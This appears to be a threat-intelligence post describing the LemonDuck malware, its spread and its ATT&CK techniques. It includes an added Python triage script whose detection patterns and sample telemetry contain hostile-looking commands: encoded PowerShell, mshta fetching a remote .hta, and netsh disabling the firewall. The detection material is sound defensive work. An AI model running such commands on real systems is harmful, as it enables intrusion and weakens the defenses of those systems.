Picture credited to https://www.galleryhenoch.com/artists/41-samuel-hung/works/
LemonDuck is a cryptomining malware dating back to 2019 that has shifted from a cryptomining botnet to a dangerous piece of software capable of stealing credentials and disabling security controls.
LemonDuck is distinct from other mining malware in how it deals with security updates. It propagates via a variety of vectors, including USB sticks, phishing emails, and old but still exploitable vulnerabilities. In addition, after infecting a machine, LemonDuck patches the same vulnerability it exploited to gain access, closing the door behind it.
LemonDuck employs a number of techniques from the MITRE ATT&CK framework, such as:
- T1190 (Exploitation for Public-Facing Application)
- T1203 (Exploitation for Client Execution)
- T1089 (Disabling Security Tools)
- T1105 (Remote File Copy)
- T1505 (Server Software Component - SQL Stored Procedures)
- T1027 (Obfuscated Files or Information)
- T1086 (PowerShell)
- T1035 (Service Execution)
- T1021.002 (Remote Services: SMB/Windows Admin Shares)
- T1053 (Scheduled Task)
- T1562.004 (Impair Defenses: Disable or Modify System Firewall)
- T1218.005 (Signed Binary Proxy Execution: Mshta Windows process)
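As an added example (not code from the original post), the script below labels constructed Windows process-creation records with the ATT&CK technique IDs listed above, the kind of first-pass triage a SOC would run over Sysmon or EDR telemetry. The rule set, the event format and the sample command lines are assumptions for illustration, not LemonDuck artifacts.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (hypothetical shape, modelled on Sysmon Event ID 1)."""
    parent: str
    image: str
    cmdline: str


# Hypothetical rule set: technique ID -> (image regex, command-line regex).
# Both patterns must match for a hit; IDs are those listed on the page above.
RULES = {
    "T1218.005": (r"\\mshta\.exe$", r"https?://|javascript:|vbscript:"),
    "T1086": (r"\\powershell\.exe$",
              r"-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}|downloadstring|\biex\b"),
    "T1053": (r"\\schtasks\.exe$", r"/create\b"),
    "T1562.004": (r"\\netsh\.exe$", r"advfirewall.*(set .*state off|firewall add rule)"),
    "T1035": (r"\\sc\.exe$", r"\bcreate\b"),
}


def match_techniques(ev: ProcEvent) -> list[str]:
    """Return the technique IDs whose image and command-line patterns both match."""
    hits = []
    for tid, (image_re, cmd_re) in RULES.items():
        if re.search(image_re, ev.image, re.I) and re.search(cmd_re, ev.cmdline, re.I):
            hits.append(tid)
    return hits


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> matched technique IDs, keeping only events with a hit."""
    findings = {}
    for idx, ev in enumerate(events):
        hits = match_techniques(ev)
        if hits:
            findings[idx] = hits
    return findings


# Constructed sample telemetry; the base64 blob decodes to "AAAAAAAAAAAA" and is not a payload.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/a.hta"),
    ProcEvent("mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"),
    ProcEvent("powershell.exe", r"C:\Windows\System32\schtasks.exe", '/create /sc minute /mo 30 /tn "upd" /tr "x"'),
    ProcEvent("cmd.exe", r"C:\Windows\System32\netsh.exe", "netsh advfirewall set allprofiles state off"),
    ProcEvent("services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for idx, tids in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, "->", ", ".join(tids))
```

A real deployment would feed this from the SIEM and add parent-child context (for example, mshta.exe spawning powershell.exe, as in the constructed sample) rather than judging each event in isolation.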
LemonDuck is most prevalent in the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam.
LemonDuck Indicators of Compromise (IOCs) can be found here.